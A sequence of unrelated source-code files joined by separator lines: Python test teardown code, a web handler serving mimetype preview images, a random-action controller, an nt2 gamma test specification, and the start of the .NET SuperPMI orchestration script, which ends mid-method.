module = builder.Module('test_importerror.py', (text, klass,))
fixture = builder.Package(
'testing_package',
(
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests_runtime_error_on_import(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
|
from vobla.utils import api_spec_exists
from vobla.handlers import BaseHandler
from vobla.utils.mimetypes import get_mimetype_preview
@api_spec_exists
class MimetypePreview(BaseHandler):
async def get(self, mimetype):
"""
---
description: Get mimetype preview image
tags:
- mimetypes
parameters:
- in: path
name: mimetype
type: string
responses:
200:
description: OK
"""
self.set_header("Content-Type", "image/png")
with open(get_mimetype_preview(mimetype), "rb") as mimetype_preview:
self.write(mimetype_preview.read())
self.set_status(200)
self.finish()
|
# Author: Birnadin Erick
# Copyright © 2021. All rights are reserved by Birnadin Erick.
# This script can be used without any written acknowledgement from author for personal or commercial purpose.
#
|
from sandbox.ours.controllers.base import Controller
class RandomController(Controller):
def __init__(self, env):
self.env = env
super().__init__()
def get_action(self, state):
""" randomly sample an action uniformly from the action space """
return self.env.action_space.sample()
|
[ ## this file was manually modified by jt
{
'functor' : {
'arity' : '1',
'call_types' : [],
'ret_arity' : '0',
'rturn' : {
'default' : 'typename boost::result_of<nt2::meta::floating(T)>::type',
},
'simd_types' : ['real_'],
'type_defs' : [],
'types' : ['real_'],
'simd_ulp_thresh' : '25.0'
},
'info' : 'manually modified',
'unit' : {
'global_header' : {
'first_stamp' : 'created by jt the 22/02/2011',
'included' : ['extern "C" {long double cephes_gammal(long double);}'],
'notes' : [],
'stamp' : 'modified by jt the 22/02/2011',
},
'ranges' : {
'real_' : [['T(0)', 'T(10)']],
},
'specific_values' : {
'real_' : {
'nt2::Inf<T>()' : {'result' : 'nt2::Inf<r_t>()','ulp_thresh' : '0',},
'nt2::Minf<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::Mone<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::Nan<T>()' : {'result' : 'nt2::Nan<r_t>()','ulp_thresh' : '0',},
'nt2::One<T>()' : {'result' : 'nt2::One<r_t>()','ulp_thresh' : '0',},
'nt2::Zero<T>()' : {'result' : 'nt2::Inf<r_t>()','ulp_thresh' : '0',},
},
},
'verif_test' : {
'nb_rand' : {
'default' : 'NT2_NB_RANDOM_TEST',
},
'property_call' : {
'default' : ['nt2::gamma(a0)'],
},
'property_value' : {
'default' : ['cephes_gammal(a0)'],
},
'ulp_thresh' : {
'default' : ['25.0'],
},
},
},
},
]
|
#!/usr/bin/env python3
#
## Licensed to the .NET Foundation under one or more agreements.
## The .NET Foundation licenses this file to you under the MIT license.
#
##
# Title : superpmi.py
#
# Notes:
#
# Script to orchestrate SuperPMI collections, replays, asm diffs, and SuperPMI
# data management. Note that some of the options provided by this script are
# also provided in our SuperPMI collect test. The test can be found here:
# https://github.com/dotnet/runtime/blob/master/src/tests/JIT/superpmi/superpmicollect.cs.
#
################################################################################
################################################################################
import argparse
import asyncio
import datetime
import locale
import logging
import os
import multiprocessing
import platform
import shutil
import subprocess
import sys
import tempfile
import queue
import re
import urllib
import urllib.request
import zipfile
from coreclr_arguments import *
locale.setlocale(locale.LC_ALL, '') # Use '' for auto, or force e.g. to 'en_US.UTF-8'
################################################################################
# Azure Storage information
################################################################################
# We store several things in Azure Blob Storage:
# 1. SuperPMI collections
# 2. A copy of PMI.dll, as a fallback in case we need it but can't find it locally,
# so we don't need to download dotnet/jitutils and build it ourselves.
# (Note: if PMI is ever published as a package, we could just download that instead.)
# 3. A copy of coredistools. If, when doing asm diffs, a copy of the coredistools
# library is not found in the Core_Root directory, we download a cached copy.
# Note: it would be better to download and use the official coredistools
# NuGet packages (like the setup-stress-dependencies scripts do).
az_account_name = "clrjit2"
az_superpmi_container_name = "superpmi"
az_collections_root_folder = "collections"
az_blob_storage_account_uri = "https://" + az_account_name + ".blob.core.windows.net/"
az_blob_storage_superpmi_container_uri = az_blob_storage_account_uri + az_superpmi_container_name
az_jitrollingbuild_container_name = "jitrollingbuild"
az_builds_root_folder = "builds"
az_blob_storage_jitrollingbuild_container_uri = az_blob_storage_account_uri + az_jitrollingbuild_container_name
################################################################################
# Argument Parser
################################################################################
description = """\
Script to run SuperPMI replay, ASM diffs, and collections.
The script also manages the Azure store of pre-created SuperPMI collection files.
Help for each individual command can be shown by asking for help on the individual command, for example
`superpmi.py collect --help`.
"""
collect_description = """\
Automate a SuperPMI collection.
"""
replay_description = """\
Run SuperPMI replay on one or more collections.
"""
asm_diff_description = """\
Run SuperPMI ASM diffs on one or more collections.
"""
upload_description = """\
Upload a collection to SuperPMI Azure storage.
"""
download_description = """\
Download collections from SuperPMI Azure storage.
Normally, collections are automatically downloaded to a local cache
as part of doing a 'replay' operation. This command allows you to
download without doing a 'replay'.
"""
list_collections_description = """\
List the existing collections in the SuperPMI Azure storage.
"""
merge_mch_description = """\
Utility command to merge MCH files. This is a thin wrapper around
'mcs -merge -recursive -dedup -thin' followed by 'mcs -toc'.
"""
spmi_log_file_help = "Write SuperPMI tool output to a log file. Requires --sequential."
jit_ee_version_help = """\
JIT/EE interface version (the JITEEVersionIdentifier GUID from jiteeversionguid.h in the format
'a5eec3a4-4176-43a7-8c2b-a05b551d4f49'). Default: if the mcs tool is found, assume it
was built with the same JIT/EE version as the JIT we are using, and run "mcs -printJITEEVersion"
to get that version. Otherwise, use "unknown-jit-ee-version".
"""
host_os_help = "OS (windows, OSX, Linux). Default: current OS."
arch_help = "Architecture (x64, x86, arm, arm64). Default: current architecture."
target_os_help = "Target OS, for use with cross-compilation JIT (windows, OSX, Linux). Default: current OS."
target_arch_help = "Target architecture, for use with cross-compilation JIT (x64, x86, arm, arm64). Passed as asm diffs target to SuperPMI. Default: current architecture."
mch_arch_help = "Architecture of MCH files to download, used for cross-compilation altjit (x64, x86, arm, arm64). Default: target architecture."
build_type_help = "Build type (Debug, Checked, Release). Default: Checked."
core_root_help = "Core_Root location. Optional; it will be deduced if possible from runtime repo root."
log_level_help = """\
Console log level (output verbosity level).
One of: critical, error, warning, info, debug.
Output from this level and higher is output to the console.
All output is always written to the log file.
Default: warning.
"""
log_file_help = "Output log file path. If not specified, a default location is chosen."
product_location_help = "Built Product directory location. Optional; it will be deduced if possible from runtime repo root."
spmi_location_help = """\
Directory in which to put SuperPMI files, such as downloaded MCH files, asm diffs, and repro .MC files.
Optional. Default is 'spmi' within the repo 'artifacts' directory.
"""
superpmi_collect_help = """\
Command to run SuperPMI collect over. Note that there cannot be any dotnet CLI commands
invoked inside this command, as they will fail due to the shim JIT being set.
"""
replay_mch_files_help = """\
MCH files, or directories containing MCH files, to use for replay. For each directory passed,
all recursively found MCH files in that directory root will be used. Files may either be a path
on disk or a URI to a MCH file to download. Use these MCH files instead of a collection from
the Azure Storage MCH file store. UNC paths will be downloaded and cached locally.
"""
filter_help = """\
Specify one or more filters to restrict the set of MCH files to download or use from the local cache.
A filter is a simple case-insensitive substring search against the MCH file path. If multiple filter
strings are specified, any maching path is accepted (it is "or", not "and").
"""
upload_mch_files_help = """\
MCH files, or directories containing MCH files, to upload. For each directory passed,
all recursively found MCH files in that directory root will be uploaded. MCT files are also uploaded.
"""
skip_cleanup_help = "Skip intermediate file removal."
break_on_assert_help = "Enable break on assert during SuperPMI replay."
break_on_error_help = "Enable break on error during SuperPMI replay."
force_download_help = """\
If downloading an MCH file, always download it. Don't use an existing file in the download location.
Normally, we don't download if the target directory exists. This forces download even if the
target directory already exists.
"""
merge_mch_pattern_help = """\
A pattern to describing files to merge, passed through directly to `mcs -merge`.
Acceptable patterns include `*.mch`, `file*.mch`, and `c:\\my\\directory\\*.mch`.
Only the final component can contain a `*` wildcard; the directory path cannot.
"""
# Start of parser object creation.
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(dest='mode', help="Command to invoke")
subparsers.required = True
# Create a parser for core_root. It can be specified directly,
# or computed from the script location and host OS, architecture, and build type:
#
# script location implies repo root,
# implies artifacts location,
# implies test location from host OS, architecture, build type,
# implies Core_Root path
#
# You normally use the default host OS, but for Azure Storage upload and other
# operations, it can be useful to allow it to be specified.
core_root_parser = argparse.ArgumentParser(add_help=False)
core_root_parser.add_argument("-arch", help=arch_help)
core_root_parser.add_argument("-build_type", default="Checked", help=build_type_help)
core_root_parser.add_argument("-host_os", help=host_os_help)
core_root_parser.add_argument("-core_root", help=core_root_help)
core_root_parser.add_argument("-log_level", help=log_level_help)
core_root_parser.add_argument("-log_file", help=log_file_help)
core_root_parser.add_argument("-spmi_location", help=spmi_location_help)
# Create a set of arguments common to target specification. Used for replay, upload, download, list-collections.
target_parser = argparse.ArgumentParser(add_help=False)
target_parser.add_argument("-target_arch", help=target_arch_help)
target_parser.add_argument("-target_os", help=target_os_help)
target_parser.add_argument("-mch_arch", help=mch_arch_help)
# Create a set of arguments common to all commands that run SuperPMI.
superpmi_common_parser = argparse.ArgumentParser(add_help=False)
superpmi_common_parser.add_argument("--break_on_assert", action="store_true", help=break_on_assert_help)
superpmi_common_parser.add_argument("--break_on_error", action="store_true", help=break_on_error_help)
superpmi_common_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
superpmi_common_parser.add_argument("--sequential", action="store_true", help="Run SuperPMI in sequential mode. Default is to run in parallel for faster runs.")
superpmi_common_parser.add_argument("-spmi_log_file", help=spmi_log_file_help)
superpmi_common_parser.add_argument("-jit_name", help="Specify the filename of the jit to use, e.g., 'clrjit_win_arm64_x64.dll'. Default is clrjit.dll/libclrjit.so")
superpmi_common_parser.add_argument("--altjit", action="store_true", help="Set the altjit variables on replay.")
# subparser for collect
collect_parser = subparsers.add_parser("collect", description=collect_description, parents=[core_root_parser, target_parser, superpmi_common_parser])
# Add required arguments
collect_parser.add_argument("collection_command", nargs='?', help=superpmi_collect_help)
collect_parser.add_argument("collection_args", nargs='?', help="Arguments to pass to the SuperPMI collect command. This is a single string; quote it if necessary if the arguments contain spaces.")
collect_parser.add_argument("--pmi", action="store_true", help="Run PMI on a set of directories or assemblies.")
collect_parser.add_argument("--crossgen", action="store_true", help="Run crossgen on a set of directories or assemblies.")
collect_parser.add_argument("--crossgen2", action="store_true", help="Run crossgen2 on a set of directories or assemblies.")
collect_parser.add_argument("-assemblies", dest="assemblies", nargs="+", default=[], help="A list of managed dlls or directories to recursively use while collecting with PMI, crossgen, or crossgen2. Required if --pmi, --crossgen, or --crossgen2 is specified.")
collect_parser.add_argument("-exclude", dest="exclude", nargs="+", default=[], help="A list of files or directories to exclude from the files and directories specified by `-assemblies`.")
collect_parser.add_argument("-pmi_location", help="Path to pmi.dll to use during PMI run. Optional; pmi.dll will be downloaded from Azure Storage if necessary.")
collect_parser.add_argument("-output_mch_path", help="Location to place the final MCH file.")
collect_parser.add_argument("--merge_mch_files", action="store_true", help="Merge multiple MCH files. Use the -mch_files flag to pass a list of MCH files to merge.")
collect_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help="Pass a sequence of MCH files which will be merged. Required by --merge_mch_files.")
collect_parser.add_argument("--use_zapdisable", action="store_true", help="Sets COMPlus_ZapDisable=1 and COMPlus_ReadyToRun=0 when doing collection to cause NGEN/ReadyToRun images to not be used, and thus causes JIT compilation and SuperPMI collection of these methods.")
# Allow for continuing a collection in progress
collect_parser.add_argument("-temp_dir", help="Specify an existing temporary directory to use. Useful if continuing an ongoing collection process, or forcing a temporary directory to a particular hard drive. Optional; default is to create a temporary directory in the usual TEMP location.")
collect_parser.add_argument("--skip_collection_step", action="store_true", help="Do not run the collection step.")
collect_parser.add_argument("--skip_merge_step", action="store_true", help="Do not run the merge step.")
collect_parser.add_argument("--skip_clean_and_verify_step", action="store_true", help="Do not run the collection cleaning, TOC creation, and verifying step.")
collect_parser.add_argument("--skip_collect_mc_files", action="store_true", help="Do not collect .MC files")
# Create a set of arguments common to all SuperPMI replay commands, namely basic replay and ASM diffs.
# Note that SuperPMI collection also runs a replay to verify the final MCH file, so many arguments
# common to replay are also applicable to that replay as well.
replay_common_parser = argparse.ArgumentParser(add_help=False)
replay_common_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help=replay_mch_files_help)
replay_common_parser.add_argument("-filter", nargs='+', help=filter_help)
replay_common_parser.add_argument("-product_location", help=product_location_help)
replay_common_parser.add_argument("--force_download", action="store_true", help=force_download_help)
replay_common_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
# subparser for replay
replay_parser = subparsers.add_parser("replay", description=replay_description, parents=[core_root_parser, target_parser, superpmi_common_parser, replay_common_parser])
# Add required arguments
replay_parser.add_argument("-jit_path", help="Path to clrjit. Defaults to Core_Root JIT.")
# subparser for asmdiffs
asm_diff_parser = subparsers.add_parser("asmdiffs", description=asm_diff_description, parents=[core_root_parser, target_parser, superpmi_common_parser, replay_common_parser])
# Add required arguments
asm_diff_parser.add_argument("-base_jit_path", help="Path to baseline clrjit. Defaults to baseline JIT from rolling build, by computing baseline git hash.")
asm_diff_parser.add_argument("-diff_jit_path", help="Path to diff clrjit. Defaults to Core_Root JIT.")
asm_diff_parser.add_argument("-git_hash", help="Use this git hash as the current hash for use to find a baseline JIT. Defaults to current git hash of source tree.")
asm_diff_parser.add_argument("-base_git_hash", help="Use this git hash as the baseline JIT hash. Default: search for the baseline hash.")
asm_diff_parser.add_argument("--diff_jit_dump", action="store_true", help="Generate JitDump output for diffs. Default: only generate asm, not JitDump.")
asm_diff_parser.add_argument("-temp_dir", help="Specify a temporary directory used for a previous ASM diffs run (for which --skip_cleanup was used) to view the results. The replay command is skipped.")
asm_diff_parser.add_argument("--gcinfo", action="store_true", help="Include GC info in disassembly (sets COMPlus_JitGCDump/COMPlus_NgenGCDump; requires instructions to be prefixed by offsets).")
# subparser for upload
upload_parser = subparsers.add_parser("upload", description=upload_description, parents=[core_root_parser, target_parser])
upload_parser.add_argument("-mch_files", metavar="MCH_FILE", required=True, nargs='+', help=upload_mch_files_help)
upload_parser.add_argument("-az_storage_key", help="Key for the clrjit Azure Storage location. Default: use the value of the CLRJIT_AZ_KEY environment variable.")
upload_parser.add_argument("-jit_location", help="Location for the base clrjit. If not passed this will be assumed to be from the Core_Root.")
upload_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
upload_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
# subparser for download
download_parser = subparsers.add_parser("download", description=download_description, parents=[core_root_parser, target_parser])
download_parser.add_argument("-filter", nargs='+', help=filter_help)
download_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
download_parser.add_argument("--skip_cleanup", action="store_true", help=skip_cleanup_help)
download_parser.add_argument("--force_download", action="store_true", help=force_download_help)
download_parser.add_argument("-mch_files", metavar="MCH_FILE", nargs='+', help=replay_mch_files_help)
# subparser for list-collections
list_collections_parser = subparsers.add_parser("list-collections", description=list_collections_description, parents=[core_root_parser, target_parser])
list_collections_parser.add_argument("-jit_ee_version", help=jit_ee_version_help)
list_collections_parser.add_argument("--all", action="store_true", help="Show all MCH files, not just those for the specified (or default) JIT-EE version, OS, and architecture")
list_collections_parser.add_argument("--local", action="store_true", help="Show the local MCH download cache")
# subparser for merge-mch
merge_mch_parser = subparsers.add_parser("merge-mch", description=merge_mch_description, parents=[core_root_parser])
merge_mch_parser.add_argument("-output_mch_path", required=True, help="Location to place the final MCH file.")
merge_mch_parser.add_argument("-pattern", required=True, help=merge_mch_pattern_help)
################################################################################
# Helper functions
################################################################################
def is_zero_length_file(fpath):
""" Determine if a file system path refers to an existing file that is zero length
Args:
fpath (str) : file system path to test
Returns:
bool : true if the path is an existing file that is zero length
"""
return os.path.isfile(fpath) and os.stat(fpath).st_size == 0
def is_nonzero_length_file(fpath):
""" Determine if a file system path refers to an existing file that is non-zero length
Args:
fpath (str) : file system path to test
Returns:
bool : true if the path is an existing file that is non-zero length
"""
return os.path.isfile(fpath) and os.stat(fpath).st_size != 0
def make_safe_filename(s):
""" Turn a string into a string usable as a single file name component; replace illegal characters with underscores.
Args:
s (str) : string to convert to a file name
Returns:
(str) : The converted string
"""
def safe_char(c):
if c.isalnum():
return c
else:
return "_"
return "".join(safe_char(c) for c in s)
def find_in_path(name, pathlist, match_func=os.path.isfile):
""" Find a name (e.g., directory name or file name) in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
name (str) : name to search for
pathlist (list) : list of directory names to search
match_func (str -> bool) : determines if the name is a match
Returns:
(str) The pathname of the object, or None if not found.
"""
for dirname in pathlist:
candidate = os.path.join(dirname, name)
if match_func(candidate):
return candidate
return None
def find_file(filename, pathlist):
""" Find a filename in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
filename (str) : name to search for
pathlist (list) : list of directory names to search
Returns:
(str) The pathname of the object, or None if not found.
"""
return find_in_path(filename, pathlist)
def find_dir(dirname, pathlist):
""" Find a directory name in the file system by searching the directories
in a `pathlist` (e.g., PATH environment variable that has been semi-colon
split into a list).
Args:
dirname (str) : name to search for
pathlist (list) : list of directory names to search
Returns:
(str) The pathname of the object, or None if not found.
"""
return find_in_path(dirname, pathlist, match_func=os.path.isdir)
def create_unique_directory_name(root_directory, base_name):
""" Create a unique directory name by joining `root_directory` and `base_name`.
If this name already exists, append ".1", ".2", ".3", etc., to the final
name component until the full directory name is not found.
Args:
root_directory (str) : root directory in which a new directory will be created
base_name (str) : the base name of the new directory name component to be added
Returns:
(str) The full absolute path of the new directory. The directory has been created.
"""
root_directory = os.path.abspath(root_directory)
full_path = os.path.join(root_directory, base_name)
count = 1
while os.path.isdir(full_path):
new_full_path = os.path.join(root_directory, base_name + "." + str(count))
count += 1
full_path = new_full_path
os.makedirs(full_path)
return full_path
def get_files_from_path(path, match_func=lambda path: True):
""" Return all files in a directory tree matching a criteria.
Args:
path (str) : Either a single file to include, or a directory to traverse looking for matching
files.
match_func (str -> bool) : Criteria function determining if a file is added to the list
Returns:
Array of absolute paths of matching files
"""
if not(os.path.isdir(path) or os.path.isfile(path)):
logging.warning("Warning: \"%s\" is not a file or directory", path)
return []
path = os.path.abspath(path)
files = []
if os.path.isdir(path):
for item in os.listdir(path):
files += get_files_from_path(os.path.join(path, item), match_func)
else:
if match_func(path):
files.append(path)
return files
def run_and_log(command, log_level=logging.DEBUG):
""" Return a command and log its output to the debug logger
Args:
command (list) : Command to run
log_level (int) : log level to use for logging output (but not the "Invoking" text)
Returns:
Process return code
"""
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout_output, _ = proc.communicate()
for line in stdout_output.decode('utf-8').splitlines(): # There won't be any stderr output since it was piped to stdout
logging.log(log_level, line)
return proc.returncode
def write_file_to_log(filepath, log_level=logging.DEBUG):
""" Read the text of a file and write it to the logger. If the file doesn't exist, don't output anything.
Args:
filepath (string) : file to log
log_level (int) : log level to use for logging output
Returns:
Nothing
"""
if not os.path.exists(filepath):
return
logging.log(log_level, "============== Contents of " + filepath)
with open(filepath) as file_handle:
lines = file_handle.readlines()
lines = [item.strip() for item in lines]
for line in lines:
logging.log(log_level, line)
logging.log(log_level, "============== End contents of " + filepath)
# Functions to verify the OS and architecture. They take an instance of CoreclrArguments,
# which is used to find the list of legal OS and architectures
def check_host_os(coreclr_args, host_os):
return (host_os is not None) and (host_os in coreclr_args.valid_host_os)
def check_target_os(coreclr_args, target_os):
return (target_os is not None) and (target_os in coreclr_args.valid_host_os)
def check_arch(coreclr_args, arch):
return (arch is not None) and (arch in coreclr_args.valid_arches)
def check_target_arch(coreclr_args, target_arch):
return (target_arch is not None) and (target_arch in coreclr_args.valid_arches)
def check_mch_arch(coreclr_args, mch_arch):
return (mch_arch is not None) and (mch_arch in coreclr_args.valid_arches)
################################################################################
# Helper classes
################################################################################
class TempDir:
""" Class to create a temporary working directory, or use one that is passed as an argument.
Use with: "with TempDir() as temp_dir" to change to that directory and then automatically
change back to the original working directory afterwards and remove the temporary
directory and its contents (if skip_cleanup is False).
"""
def __init__(self, path=None, skip_cleanup=False):
self.mydir = tempfile.mkdtemp() if path is None else path
self.cwd = None
self._skip_cleanup = skip_cleanup
def __enter__(self):
self.cwd = os.getcwd()
os.chdir(self.mydir)
return self.mydir
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
if not self._skip_cleanup:
shutil.rmtree(self.mydir)
class ChangeDir:
""" Class to temporarily change to a given directory. Use with "with".
"""
def __init__(self, mydir):
self.mydir = mydir
self.cwd = None
def __enter__(self):
self.cwd = os.getcwd()
os.chdir(self.mydir)
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
class AsyncSubprocessHelper:
""" Class to help with async multiprocessing tasks.
"""
def __init__(self, items, subproc_count=multiprocessing.cpu_count(), verbose=False):
self.items = items
self.subproc_count = subproc_count
self.verbose = verbose
self.subproc_count_queue = None
if 'win32' in sys.platform:
# Windows specific event-loop policy & cmd
asyncio.set_event_loop(asyncio.ProactorEventLoop())
async def __get_item__(self, item, index, size, async_callback, *extra_args):
""" Wrapper to the async callback which will schedule based on the queue
"""
# Wait for the subproc_id queue to become free, meaning we have an available
# processor to run a task (specifically, we are below our maximum allowed
# parallelism). Then start running the sub process.
subproc_id = await self.subproc_count_queue.get()
print_prefix = ""
if self.verbose:
print_prefix = "[{}:{}]: ".format(index, size)
await async_callback(print_prefix, item, *extra_args)
# Add back to the queue, in case another process wants to run.
self.subproc_count_queue.put_nowait(subproc_id)
async def __run_to_completion__(self, async_callback, *extra_args):
""" async wrapper for run_to_completion
"""
# Create a queue with one entry for each of the threads we're
# going to allow. By default, this will be one entry per CPU.
# Using subproc_count_queue.get() will block when we're running
# a task on every CPU.
chunk_size = self.subproc_count
self.subproc_count_queue = asyncio.Queue(chunk_size)
for item in range(chunk_size):
self.subproc_count_queue.put_nowait(item)
# Create a 'tasks' list of async function calls, one for each item.
# When all these calls complete, we're done.
size = len(self.items)
count = 1
tasks = []
for item in self.items:
tasks.append(self.__get_item__(item, count, size, async_callback, *extra_args))
count += 1
# Inovke all the calls to __get_item__ concurrently and wait for them all to finish.
await asyncio.gather(*tasks)
def run_to_completion(self, async_callback, *extra_args):
""" Run until the item queue has been depleted
Notes:
Acts as a wrapper to abstract the async calls to
async_callback. Note that this will allow cpu_count
amount of running subprocesses. Each time the queue
is emptied, another process will start. Note that
the python code is single threaded, it will just
rely on async/await to start subprocesses at
subprocess_count
"""
reset_env = os.environ.copy()
loop = asyncio.get_event_loop()
loop.run_until_complete(self.__run_to_completion__(async_callback, *extra_args))
os.environ.update(reset_env)
################################################################################
# SuperPMI Collect
################################################################################
class SuperPMICollect:
""" SuperPMI Collect class
Notes:
The object is responsible for setting up a SuperPMI collection given
the arguments passed into the script.
"""
def __init__(self, coreclr_args):
""" Constructor
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
if coreclr_args.host_os == "OSX":
self.collection_shim_name = "libsuperpmi-shim-collector.dylib"
self.corerun_tool_name = "corerun"
self.crossgen_tool_name = "crossgen"
elif coreclr_args.host_os == "Linux":
self.collection_shim_name = "libsuperpmi-shim-collector.so"
self.corerun_tool_name = "corerun"
self.crossgen_tool_name = "crossgen"
elif coreclr_args.host_os == "windows":
self.collection_shim_name = "superpmi-shim-collector.dll"
self.corerun_tool_name = "corerun.exe"
self.crossgen_tool_name = "crossgen.exe"
else:
raise RuntimeError("Unsupported OS.")
self.jit_path = os.path.join(coreclr_args.core_root, determine_jit_name(coreclr_args))
self.superpmi_path = determine_superpmi_tool_path(coreclr_args)
self.mcs_path = determine_mcs_tool_path(coreclr_args)
self.core_root = coreclr_args.core_root
self.collection_command = coreclr_args.collection_command
self.collection_args = coreclr_args.collection_args
if coreclr_args.pmi:
self.pmi_location = determine_pmi_location(coreclr_args)
self.corerun = os.path.join(self.core_root, self.corerun_tool_name)
if coreclr_args.crossgen:
self.crossgen_tool = os.path.join(self.core_root, self.crossgen_tool_name)
if coreclr_args.crossgen2:
self.corerun = os.path.join(self.core_root, self.corerun_tool_name)
if coreclr_args.dotnet_tool_path is None:
self.crossgen2_driver_tool = self.corerun
else:
self.crossgen2_driver_tool = coreclr_args.dotnet_tool_path
logging.debug("Using crossgen2 driver tool %s", self.crossgen2_driver_tool)
if coreclr_args.pmi or coreclr_args.crossgen or coreclr_args.crossgen2:
self.assemblies = coreclr_args.assemblies
self.exclude = coreclr_args.exclude
self.coreclr_args = coreclr_args
# Pathname for a temporary .MCL file used for noticing SuperPMI replay failures against base MCH.
self.base_fail_mcl_file = None
# The base .MCH file path
self.base_mch_file = None
# Final .MCH file path
self.final_mch_file = None
# The .TOC file path for the clean thin unique .MCH file
self.toc_file = None
self.temp_location = None
############################################################################
# Instance Methods
############################################################################
def collect(self):
""" Do the SuperPMI Collection.
"""
# Do a basic SuperPMI collect and validation:
# 1. Collect MC files by running a set of sample apps.
# 2. Create a merged thin unique MCH by using "mcs -merge -recursive -dedup -thin base.mch *.mc".
# 3. Create a clean MCH by running SuperPMI over the MCH, and using "mcs -strip" to filter
# out any failures (if any).
# 4. Create a TOC using "mcs -toc".
# 5. Verify the resulting MCH file is error-free when running SuperPMI against it with the
# same JIT used for collection.
#
# MCH files are big. If we don't need them anymore, clean them up right away to avoid
# running out of disk space in disk constrained situations.
passed = False
try:
with TempDir(self.coreclr_args.temp_dir, self.coreclr_args.skip_cleanup) as temp_location:
# Setup all of the temp locations
self.base_fail_mcl_file = os.path.join(temp_location, "basefail.mcl")
self.base_mch_file = os.path.join(temp_location, "base.mch")
self.temp_location = temp_location
if self.coreclr_args.output_mch_path is not None:
self.final_mch_file = os.path.abspath(self.coreclr_args.output_mch_path)
final_mch_dir = os.path.dirname(self.final_mch_file)
if not os.path.isdir(final_mch_dir):
os.makedirs(final_mch_dir)
else:
default_coreclr_bin_mch_location = os.path.join(self.coreclr_args.spmi_location, "mch", "{}.{}.{}".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type))
if not os.path.isdir(default_coreclr_bin_mch_location):
os.makedirs(default_coreclr_bin_mch_location)
self.final_mch_file = os.path.abspath(os.path.join(default_coreclr_bin_mch_location, "{}.{}.{}.mch".format(self.coreclr_args.host_os, self.coreclr_args.arch, self.coreclr_args.build_type)))
self.toc_file = "{}.mct".format(self.final_mch_file)
# If we have passed temp_dir, then we have a few flags we need
# to check to see where we are in the collection process. Note that this
# functionality exists to help not lose progress during a SuperPMI collection.
# It is not unreasonable for the SuperPMI collection to take many hours
# therefore allow re-use of a collection in progress
if not self.coreclr_args.skip_collection_step:
self.__collect_mc_files__()
if not self.coreclr_args.skip_merge_step:
if not self.coreclr_args.merge_mch_files:
self.__merge_mc_files__()
else:
self.__merge_mch_files__()
if not self.coreclr_args.skip_clean_and_verify_step:
self.__create_clean_mch_file__()
self.__create_toc__()
self.__verify_final_mch__()
passed = True
except Exception as exception:
logging.critical(exception)
return passed
############################################################################
# Helper Methods
############################################################################
def __collect_mc_files__(self):
""" Do the actual SuperPMI collection for a command
Returns:
None
"""
if not self.coreclr_args.skip_collect_mc_files:
assert os.path.isdir(self.temp_location)
# Set environment variables. For crossgen2, we need to pass the COMPlus variables as arguments to the JIT using
# the `-codegenopt` argument.
env_copy = os.environ.copy()
root_env = {}
root_env["SuperPMIShimLogPath"] = self.temp_location
root_env["SuperPMIShimPath"] = self.jit_path
complus_env = {}
complus_env["EnableExtraSuperPmiQueries"] = "1"
complus_env["TieredCompilation"] = "0"
if self.coreclr_args.use_zapdisable:
complus_env["ZapDisable"] = "1"
complus_env["ReadyToRun"] = "0"
logging.debug("Starting collection.")
logging.debug("")
def set_and_report_env(env, root_env, complus_env = None):
for var, value in root_env.items():
env[var] = value
print_platform_specific_environment_vars(logging.DEBUG, self.coreclr_args, var, value)
if complus_env is not None:
for var, value in complus_env.items():
complus_var = "COMPlus_" + var
env[complus_var] = value
print_platform_specific_environment_vars(logging.DEBUG, self.coreclr_args, complus_var, value)
# If we need them, collect all the assemblies we're going to use for the collection(s).
# Remove the files matching the `-exclude` arguments (case-insensitive) from the list.
if self.coreclr_args.pmi or self.coreclr_args.crossgen or self.coreclr_args.crossgen2:
assemblies = []
for item in self.assemblies:
assemblies += get_files_from_path(item, match_func=lambda file: any(file.endswith(extension) for extension in [".dll", ".exe"]) and (self.exclude is None or not any(e.lower() in file.lower() for e in self.exclude)))
if len(assemblies) == 0:
logging.error("No assemblies found using `-assemblies` and `-exclude` arguments!")
else:
logging.debug("Using assemblies:")
for item in assemblies:
logging.debug(" %s", item)
logging.debug("") # add trailing empty line
################################################################################################ Do collection using given collection command (e.g., script)
if self.collection_command is not None:
logging.debug("Starting collection using command")
collection_command_env = env_copy.copy()
collection_complus_env = complus_env.copy()
collection_complus_env["JitName"] = self.collection_shim_name
set_and_report_env(collection_command_env, root_env, collection_complus_env)
logging.info("Collecting using command:")
logging.info(" %s %s", self.collection_command, " ".join(self.collection_args))
assert isinstance(self.collection_command, str)
assert isinstance(self.collection_args, list)
command = [self.collection_command, ] + self.collection_args
proc = subprocess.Popen(command, env=collection_command_env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout_output, _ = proc.communicate()
for line in stdout_output.decode('utf-8').splitlines(): # There won't be any stderr output since it was piped to stdout
logging.debug(line)
################################################################################################ end of "self.collection_command is not None"
